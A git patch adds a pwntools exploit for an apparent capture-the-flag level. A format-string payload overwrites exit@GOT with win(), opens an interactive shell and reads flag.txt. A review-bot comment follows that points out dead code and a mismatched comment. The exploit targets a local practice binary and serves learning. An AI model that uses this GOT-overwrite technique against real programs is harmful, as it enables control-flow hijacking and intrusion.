From ded1ad9d4c9944b797204f6e87ea676216c881d0 Mon Sep 17 00:00:00 2001
From: Eggert Jung
Date: Tue, 27 Jan 2026 02:16:46 +0100
Subject: [PATCH] 10

---
 4/level10/test.py | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 4/level10/test.py

diff --git a/4/level10/test.py b/4/level10/test.py
new file mode 100644
index 0000000..c608ca3
--- /dev/null
+++ b/4/level10/test.py
@@ -0,0 +1,37 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = ELF('./level10')
+
+# Addresses
+exit_got = elf.got['exit']
+win_addr = elf.symbols['win']
+
+print("exit got: ", hex(exit_got))
+print("win : ", hex(win_addr))
+
+# Build a fmtstr payload that rewrites exit@GOT ? win()
+# write_size='short' uses %hn twice for 2-byte writes
+
+#for i in range(1,30):
+#print("##################### ", i)
+p = process(elf.path)
+#p = remote("localhost", 4010)
+
+context.clear(arch = 'amd64')
+payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
+
+# Send and get shell
+p.recvuntil("talk about?".encode())
+p.sendline(payload)
+print("send: ", payload.hex())
+res = p.recvline()
+print("got: ", res)
+p.interactive()
+res = p.recvline()
+print("got: ", res)
+
+p.sendline("cat flag.txt")
+print("send cat")
+res = p.recvline()
+print("got: ", res)
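Review bot: The seven lines after `p.interactive()` are effectively dead: `interactive()` hands the tube to the user and returns only on Ctrl-C/Ctrl-D or EOF, after which the following `p.recvline()` and `p.sendline("cat flag.txt")` typically hit a closed tube and raise EOFError, so the scripted flag read never runs unattended. Either drop that tail and rely on the interactive shell, or drop `interactive()` and script the read as `p.sendline(b"cat flag.txt")` followed by `print(p.recvall(timeout=2))`, which also makes the send consistent with the explicit `.encode()` used for `recvuntil` earlier in the hunk. The comment `# write_size='short' uses %hn twice for 2-byte writes` does not match the call, which leaves `fmtstr_payload` at its default `write_size='byte'`; either pass `write_size='short'` or correct the comment. The commented-out `for i in range(1,30)` offset-bruteforce scaffold and the `remote("localhost", 4010)` line should be removed or gated behind a command-line switch rather than left as toggle-by-editing. Overwriting `exit@GOT` also presumes the binary has only partial RELRO and actually calls `exit()` after the format string is consumed, which the script assumes but cannot be confirmed from here.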